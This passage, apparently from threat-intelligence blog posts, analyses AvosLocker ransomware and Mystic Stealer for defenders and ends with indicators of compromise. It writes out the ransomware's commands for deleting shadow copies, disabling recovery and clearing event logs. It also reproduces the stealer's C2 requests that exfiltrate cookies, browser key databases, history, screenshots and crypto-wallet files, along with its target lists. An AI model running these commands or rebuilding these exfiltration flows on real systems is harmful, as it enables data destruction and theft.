antivirus programs) would likely not be running. This technique ensured that these applications would not interfere with file encryption. The ability to encrypt files in Windows Safe Mode is a feature that has been observed in other ransomware families, including Conti, REvil, and BlackMatter. Infections by Industry Figure 1, shown below, depicts the industries most affected by AvosLocker as a percentage of total attacks over the past year. AvosLocker focused its attacks on the education sector and received approximately 25% of the group’s total attacks. Furthermore, AvosLocker impacted the manufacturing and healthcare industry, which accounted for approximately 15.38% and 9.62%, respectively. Figure 1: Industry verticals targeted by double extortion attacks using AvosLocker Countries Targeted by AvosLocker The U.S. emerged as the hardest-hit country in attacks orchestrated by the AvosLocker group, with more than 72% of attacks as shown in Figure 2. This highlights the scale and severity of the cyberthreat faced by U.S. businesses and institutions. Canadian organizations received 9.3% of AvosLocker’s attacks. China and Taiwan shared a similar level of impact, each experiencing 3.7% of AvosLocker attacks. Figure 2: Breakdown of victims by country breached by AvosLocker Ransomware AnalysisSince first discovered in 2021, AvosLocker binaries have undergone slight changes and improvements. The following is a detailed analysis of the last variant used in-the-wild.Command line argumentsAvosLocker implements multiple command line arguments, as shown in Figure 3, allowing for customization of the ransomware execution based on affiliate requirements.Figure 3: AvosLocker command line argumentsThe threat actor decides what functionality to enable/disable during the execution of the AvosLocker ransomware. When executed, the selected options are displayed in the console as shown below.Build: SonicBoom b_bruteforce_smb_enable: 0 b_logical_disable: 0 b_network_disable: 1 b_mutex_disable: 0 concurrent_threads_num_max: 200AvosLocker creates the mutex Zheic0WaWie6zeiy by default to ensure that only one ransomware process is running at a given time, unless the --nomutex command line argument is provided.Pre-encryption measuresUpon execution, AvosLocker first checks whether it has administrative privileges, and if not, it shows the debug message in the console, The token does not have the specified privilege, and then executes a process termination routine targeting databases, web browsers, and other business applications. The list of processes to be terminated were decoded dynamically using a stack-based string obfuscation algorithm (described later in the report). The process names in Table 1 were terminated.Table 1: AvosLocker process termination listencsvcthebatmydesktopqosxfssvcconfirefoxinfopathwinwordsteamsynctimenotepadocommonenotemspubthunderbirdagntsvcmydesktopserviceexcelpowerpntoutlookwordpaddbeng50isqlplussvcsqbcoreserviceoracleocautoupdsdbsnmpmsaccesstbirdconfigocssdsql & visioThen, AvosLocker performs the following actions:Deletes Windows shadow copies to prevent the recovery of files using the following commands:wmic shadowcopy delete /nointeractive vssadmin.exe Delete Shadows /All /QuietDisables recovery mode and the edits the boot status policy, which prevents access to Windows Recovery Mode with the following commands:bcdedit /set {default} recoveryenabled No bcdedit /set {default} bootstatuspolicy ignoreallfailures Deletes the Windows event logs to cover up evidence of malicious activity with the following PowerShell command:Powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }" Encryption processAvosLocker leverages multiple threads to encrypt the target files on an infected machine. Then it enumerates all drives (e.g., fixed, removable, and network shares) based on the command line arguments. The ransomware then performs a file extension check where the files with the extensions in Table 2 are excluded and not encrypted.Table 2: AvosLocker extension exclusion listavosavoslinuxavos2avos2jthemepacknlsdiagpkgmsilnkexecabscrbatdrvrtpmspprfmscicokeyocxdiagcabdiagcfgpdbwpxthemempahlpicnsromdllmsstylesmodps1nomediasplicshtabincmdani386lockcpladvcuridxsyscomdeskthemepackshsldficlmsuIn addition, AvosLocker won’t encrypt any files listed in Table 3.Table 3: Files excluded by AvosLockerThumbs.dbntuser.inintuser.dat.logntuser.datntldriconcache.dbdesktop.iniconfig.msibootsect.bakbootfont.binboot.iniautorun.infFurthermore, AvosLocker won’t encrypt the directories in Table 4.Table 4: Folders excluded by AvosLockerAll UsersAppDatabootbootmgrGamesIntelMicrosoft.Program Files/Program Files (x86)ProgramDataPublicSophosSystem Volume InformationWindowsWindows.oldWinNTMicrosoftSQL ServerAvosLocker encrypts file content using AES in CBC mode with a randomly generated AES key. The AES symmetric key is then encrypted with a 2,048-bit RSA public key embedded in the ransomware binary. Finally, the RSA data containing the encrypted AES key is Base64 encoded and appended to the end of the encrypted file (see Figure 4). Then, the file extension is changed to .avos2.Figure 4: AvosLocker encrypted file contentsDuring the encryption phase, the ransomware also prints debug messages to the console that show encryption statistics to the threat actor as shown D: took 0.003000 seconds drive Z: took 0.119000 seconds drive A: took 1.060000 seconds drive C: took 19.672000 seconds Waiting for encryption threads to finish ... [OK] Encryption Stats [+] Locked objects: 6313 asym time: clocks 14465 total time: clocks 20648 | 20.648000 secondsAfter encryption, AvosLocker drops a ransom note named GET_YOUR_FILES_BACK.txt as shown in Figure 5.Figure 5: AvosLocker ransom noteAvosLocker also changes the Windows desktop wallpaper (shown in Figure 6) to a message similar to the ransom note text file.Figure 6: AvosLocker ransom note wallpaperThe victim ID mentioned in the ransom note is hardcoded in the AvosLocker binary and the ransom note’s filename is README_FOR_RESTORE. ThreatLabz also observed AvosLocker using different file extensions such as .avos, .avos2, and .avoslinux, with the latter being used for the Linux variant. The Linux variant is very similar to the Windows version, but also possesses the capability to terminate and encrypt ESXi virtual machines.Data Leak Site If a victim decided not to pay a ransom, the group would post stolen data to their data leak site hosted via a Tor hidden service. This tactic was designed to pressure victims to pay a ransom to avoid a loss of sensitive information that may be damaging to the victim organization when publicly disclosed. The AvosLocker data leak site has been down since July 2023 and the payment site went down in August 2023. ThreatLabz observed a total of 60 victims’ data posted on the data leak site as shown in Figure 7. Figure 7: AvosLocker data leak site Anti-Analysis All the important strings in AvosLocker ransomware samples are obfuscated using ADVObfuscator,which pushes encoded versions of strings to the stack, and then decodes them at runtime (as shown in Figure 8), using simple but different algorithms and keys. Figure 8: AvosLocker string obfuscation For instance, the string above decodes to: cmd /c wmic shadowcopy delete /nointeractive NetMonitor Backdoor AvosLocker leverages NetMonitor, a tool that appears like a legitimate network monitoring utility, but in reality acts as a backdoor for AvosLocker. NetMonitor establishes persistence after being installed as a system service, using names such as: NetAppTcp, NetAppTcpSvc, WazuhWinSrv, RSM, WinSSP, WebService, etc. Once initiated, NetMonitor tries to contact its C2 server every 5 seconds using a hardcoded IP address and port (usually 443). The malware uses raw sockets and a small binary protocol for all communication, where the encrypted ping packet contains content similar to that shown in Figure 9. Figure 9: NetMonitor encrypted communication The first four bytes are random, and the remaining bytes are an RC4 encrypted payload with an 8 byte key. Figure 10 shows the actual payload content after the decryption. Figure 10: NetMonitor decrypted communication The first four bytes are also random (and identical to the previous four bytes prepended to the encrypted payload) followed by a command. Depending on the command received, NetMonitor then starts listening on a port or acts as a reverse proxy server. NetMonitor was closely tied to AvosLocker, with the last observed activity occurring in the first half of 2023, and no new samples have been identified since August 2023. Conclusion AvosLocker is a ransomware group that was active and performing double extortion attacks until May 2023. The group also targeted multiple operating systems with different ransomware variants. Zscaler ThreatLabz continues to track different ransomware groups and add indicators of compromise to protect our customers. Please read Zscaler’s yearly ransomware report to learn more about the various trends and most significant ransomware groups. Zscaler Coverage Cloud Sandbox In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to AvosLocker at various levels with the threat names listed below. Win32.Ransom.Avos Indicators of Compromise (IOCs) AvosLocker Hashes 1076a979c6a7633ee3a4884d738452c5 1330887fe501036aff6ed443340e9405 d285f1366d0d4fdae0b558db690497ea 76e177a94834b3f7c63257bc8011f60f b27f0f2826bacd329fb28d9cda002d7d 16a5d134d50eeb34989b48dca166462d f9de6998546e9ea169c54527962e1e92 1933f61951738b6fdbfff3fa0f65d712 63e12fa6203dc61fc82343e7dec1b33b 4e75f8dc15a82674c57c4f12dbd78808 8c4bfd216fb8e69f7f1e1f4cb1e3f9a1 0e9432cd9e9405b04f4e46b368585d60 19944159dfa94a1b75effd85e6b906dc 869fc579f45a790b7c485d52cb2c8986 0b3888d8683d3ebb27627452a0179575 194c16941dc618facef7d0c4749a39a7 c41c5de8abeb92adaf8a86cf8b31570e f091b9085d35e61945c743e3683b1b71 2d7cf26f4e4dacf637f7ef0b1edfbda5 a0a60441609f42f2f79c7826db9ae296 URLs Payment Sites: avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion avos2fuj6olp6x36.onion Data Leak Sites: avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion avos53nnmi4u6amh.onion NetMonitor Hashes A5485e8f09f6428b42b499bc914532e6 e5dac186720ea10f3752aa30a96d3fc0 9ff900a05d75b97948a3b52d8835b21f 15e948c18ea77efb5ffbf0a72d05d348 85e44d1333422e9b550c94ad7b7202a0 d59dca267722dfd923350d5b139b1036 C&Cs Fri, 27 oct 2023 08:17:50 -0700 Niraj Shivtarkar Mystic Stealer Revisited Introduction Mystic Stealer is a relatively new downloader and information stealer that emerged in early 2023. The malware harvests data from a large number of web browsers and cryptocurrency wallet applications. Mystic can also be used to steal Steam game credentials and arbitrary files from an infected system. Mystic stands out for the level of obfuscation and improvements with each new version of the malware. The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to Mystic Stealer failing to beacon back to a C2 server in corporate environments, which frequently block network traffic on non-standard ports. The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner. In this blog, we will analyze the latest updates to Mystic Stealer as a follow-up to our previous report. Key Takeaways Mystic Stealer is an information stealer that was first advertised in April 2023, which targets nearly 40 web browsers and more than 70 browser extensions. Mystic Stealer has been regularly updated with improvements to its code obfuscation, configuration, and methods of communication. The malware’s command and control (C2) communications have been updated from a custom encrypted binary protocol to HTTP. Mystic Stealer has added loader functionality in recent versions to complement its information stealing abilities. Mystic Stealer has been used by numerous threat groups that leverage it to distribute second-stage malware payloads including RedLine, DarkGate, and GCleaner. Technical Analysis The latest variant of Mystic Stealer has introduced some notable changes in both the behavior of the malware and in the obfuscation. The entry point of the malware is very similar to the older variant. The malware exits if the current date is older than a specific hardcoded date. Figure 1 shows a comparison of the main function between the previous variant and the current variant. Figure 1: Comparison of the WinMain function for the current and previous Mystic variants In the latest variant of Mystic Stealer, the decryption of the malware C2s has been moved to a sub-function that is executed after the expiration date (probably to avoid leaking the C2s in memory if this time check fails). Embedded C2 Configuration The algorithm used to decrypt the list of C2 is the same custom XTEA-based algorithm as the previous variant. However, after the custom XTEA layer has been decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2 path is stored among the list of obfuscated strings that are constructed and decoded using the stack as shown in Figure 2. Figure 2. Mystic Stealer C2 path obfuscation Information Stealing Configuration In the previous Mystic Stealer variant, the target lists for web browsers, extensions (and their IDs), and cryptocurrency applications were embedded and obfuscated in the malware. In recent versions, the application target list is now downloaded from the C2 server instead of being hardcoded, as we will examine in the following section. CommunicationsIn the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="<name>" BASE64(<data>) --<boundary> The response data from the server is also encoded in Base64. The response starts with “OK\r\n” and is followed by any data returned by the C2 server for the specific query.HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK <rest of data for the specific command, if necessary>)RegistrationThe infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim’s machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="hwid" BASE64(0123456789ABCDEF123456) --<boundary> Content-Disposition: form-data; name="build" BASE64(botnet_id) --<boundary>--The C2 server generates and returns a session token (a 64 byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicates which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc).HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 07 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)When the bot submits information to the C2 server, it sends a POST request with:A filename variable containing the name of the file being submitted, Base64 encodedA file variable with the content of the file, also Base64 encodedA token variable with the session token from the registration requestPOST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("example.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of example.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- If the request is valid, the server answers with an OK response.After registration, the bot sends information about the infected system via a file named SystemInformation.txt that contains information similar to the following:Build mark: zzzz IP: {ip} File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe UserName: xxxx ComputerName: XXXX Country: {country} Location: {location} Zip code: {zipcode} TimeZone: {timezone} HWID: 0123456789ABCDEF012345 Current language: English (United States) ScreenSize: 1792x1120 Operation System: Windows 10 Pro x64 Available KeyboardLayouts: English (United States) Hardwares: CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz GPU: VMware SVGA 3D RAM: 4293898240ll Information StealingOnce Mystic Stealer has registered and reported the infected system information, the binary flags from the C2 server determine whether to conduct data theft and load additional malware payloads. Mystic Stealer sends HTTP POST requests for specific target lists by specifying the value in a msg variable.BrowsersDepending on the configuration, Mystic Stealer will steal data from Chromium-based browsers by first requesting a target list from the C2 server.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("chromium-browsers") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- The Mystic Stealer C2 server will respond with a list of Chromium-based browsers to target. The Appendix section shows the full list of browsers that have been targeted.Citrio|%localappdata%\CatalinaGroup\Citrio\User Data|Coowon|%localappdata%\Coowon\Coowon\User Data|Liebao|%localappdata%\liebao\User Data|QIP Surf|%localappdata%\QIP Surf\User Data|Orbitum|%localappdata%\Orbitum\User Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User Data|Amigo|%localappdata%\Amigo\User\User Data|Torch|%localappdata%\Torch\User Data|Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data|Comodo|%localappdata%\Comodo\User Data|360Browser|%localappdata%\360Browser\Browser\User Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...Each element of the list contains the name of the browser and the path where the browser’s data is stored: Browser name 1|Browser path 1|..............|Browser N|Browser path NMystic Stealer also retrieves a list of browser extensions to target.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64(extensions) --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>--The Mystic Stealer C2 server will return the browser extensions configuration.Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdg oeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddoj jnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcgg cfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkp anlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcg hachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|... In this case, each element contains the name of the extension and the ID.Extension name 1|Extension ID 1|....|Extension name N|Extension ID NNext, the malware downloads the legitimate sqlite3.dll DLL from the C2 server. This library is used to parse web browser SQLite database files.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("sqlite3") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>--The response is the sqlite3 DLL Base64 encoded, as shown below:HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK BASE64(<sqlite3 file>)) The stolen browser data (if any) is sent to the C2 server. For example, cookies stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as shown below:POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64(“Cookies/Microsoft_Edge_Default.txt”) --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Cookies/Microsoft_Edge_Default.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- Depending on the configuration, Mystic Stealer will also retrieve a list gecko-browsers to target.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("gecko-browsers") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- The configuration format is identical to the chromium-browser list.Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NET GATE Technologies\BlackHawk\Profiles|Cyber fox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mo zilla\icecat\ProfilesMystic Stealer will collect a number of database files from Firefox-based browsers containing cookies, certificates, keys, etc., as shown below:POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Gecko/Firefox/<profile>.default/key4.db") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK) POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Gecko/Firefox/<profile>.default/cert9.db") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK) POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Cookies/Firefox_<profile>.default.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Cookies/Firefox_<profile>.default.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK)If the browser history configuration flag (position 4) is set to 1, Mystic Stealer also sends the victim’s browsing history.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("History/Firefox_8qjvd3qg.default-release.txt") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>--The browser history file contains the website title (if available) and the URL as shown below:Title: <Title1> Url: <url1> =============== Title: <Title2> Url: <url2> =============== ... =============== Title: <TitleN> Url: <urlN> ===============ScreenshotsIf the screenshot configuration flag (position 8) is set to 1, Mystic Stealer captures and sends a screenshot of the victim’s machine.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="filename" BASE64("Screenshot.jpeg") --<boundary> Content-Disposition: form-data; name="file" BASE64(<content of Screenshot.jpeg>) Content-Disposition: form-data; name="token" BASE64(<token>) –<boundary>--FilesMystic Stealer also downloads a list of files to be stolen from the victim.POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("files") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- The Mystic Stealer C2 server returns a list of target files and directories to steal. For example, ThreatLabz has observed this feature used to steal cryptocurrency wallets as shown below:Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveld b|*.*|0|Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.jso n,simple-storage.json,.finger-print.fp|0|Wallets/Co inomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exo dus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info .seco|1|Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitco in\wallets|*wallet*.dat|0|Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereu m|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\w allets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0 |Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata% \MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0The format for each targeted file is shown below:Directory name|Location on disk|Target files mask|FlagThe flag parameter indicates whether Mystic Stealer should recursively search the target directory. Once finished, a “done” msg is sent, to indicate the file stealing task is finished.LoaderA “loader” msg can be sent by Mystic Stealer to the C2 server to request additional second-stage malware payloads, as shown below:POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=<boundary> Content-Length: NNN User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: X.X.X.X Connection: Keep-Alive Cache-Control: no-cache --<boundary> Content-Disposition: form-data; name="msg" BASE64("loader") --<boundary> Content-Disposition: form-data; name="token" BASE64(<token>) --<boundary>-- HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 11 Sep 2023 HH:MM:SS GMT Content-Type: text/html; charset=utf-8 Content-Length: NNN Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)) The response to the loader request is an initial Base64 encoded layer containing an OK response with a set of one or more Base64 encoded executables:Figure 3: Base64 encoded executables downloaded by Mystic StealerThe packet follows this format:|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)The parameter that precedes the Base64 encoded executable does not appear to be currently used, although it may indicate a potential feature that has yet to be implemented such as whether to write the binary to disk or inject it into another process. After downloading and executing these binary payloads, Mystic Stealer sends a final POST request with the message “loadercode”. The C2 server will then return an empty response.Debug BuildsZscaler ThreatLabz has found recent samples compiled in September and October 2023, which contain plaintext strings that typically are obfuscated in other samples:Figure 4: Mystic Stealer debug version plaintext stringsIn addition, these samples have string references with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the original C++ code. Interestingly, the username in these full paths is will. ThreatLabz suspects these samples are compiled from code that is still in development where they could be testing improvements and new features.Conclusion Even though Mystic Stealer is a relatively new information stealing malware, ThreatLabz has observed a significant increase in threat actors leveraging it to deploy additional malware. The developer behind Mystic Stealer is continuously modifying and improving the code, and the malware is quickly evolving. The C2 communication protocol used by Mystic Stealer has switched from a custom binary protocol to an HTTP-based protocol, likely to improve beaconing from infections in corporate environments that leverage firewalls to filter suspicious network traffic. Based on the number of new Mystic Stealer samples and C2 panels, the malware is likely to continue to pose a threat to organizations. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Cloud Sandbox Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels. Indicators of Compromise (IoCs) Hash First Seen Expiration Date Botnet ID C2 6203249bebf7248535ff5ef70a7c5a57 688b399d91ac63c9d73441af6e65f184 2023-10-08 08:36:29 UTC 2023-11-09T20:02:21 15 hxxp://171.22.28[.]235/loghub/master 7eb8617d09f204dd40541a000f98810 19ff103ff330cb0e7aebb8c3a160cfd26 2023-09-29 15:30:00 UTC 2023-10-26T11:48:42 Chung hxxp://194.87.31[.]123/loghub/master 21a8db193093caf6acbcd14ba64c9 8a1c9f16998cade8f60fa0fb4dc63e33bd2 2023-09-18 21:36:22 UTC 2023-09-22T12:35:08 mema hxxp://5.42.92[.]211/loghub/master 7003eadaef73ac1f2e0f0a86a3d1f57 92a5dde3a45ba71e095861b55059b3780 2023-09-07 07:53:28 UTC 2023-09-12T20:08:32 tresk hxxp://5.42.92[.]211/loghub/master 00fe26cfe465740e61b99f105bcf251 6ff49e117f23f4b508d5256c57fa3fc66 2023-06-26 05:51:47 UTC 2023-07-24T18:48:13 sup hxxp://188.40.116[.]251:8005/loghub/master Appendix Decrypted Malware Strings %08lX%04lX%lu %ix%i %ls %ls %ls [%ls %d] ERROR in %s, line %d, function %s. %s %ls\\%ls %ls\\%ls\\Local State %ls\\* %ls\\Web Data %ls\\cookies.sqlite %ls\\formhistory.sqlite %ls\\places.sqlite %s/%s %userprofile%\\Telegram Desktop\\tdata &&\" **(# + &0'fg{199 (ov_(ov ,+& ##* -t{d2 ..*($2nd-2d-2o595 ..\\stealer\\chromiumbrowsers.cpp ..\\stealer\\filesgrabber.cpp ..\\stealer\\geckobrowsers.cpp ..\\stealer\\httpclient.cpp ..\\stealer\\loader.cpp ..\\stealer\\sqlite3.cpp ..\\stealer\\stealer.cpp /c schtasks /create /F 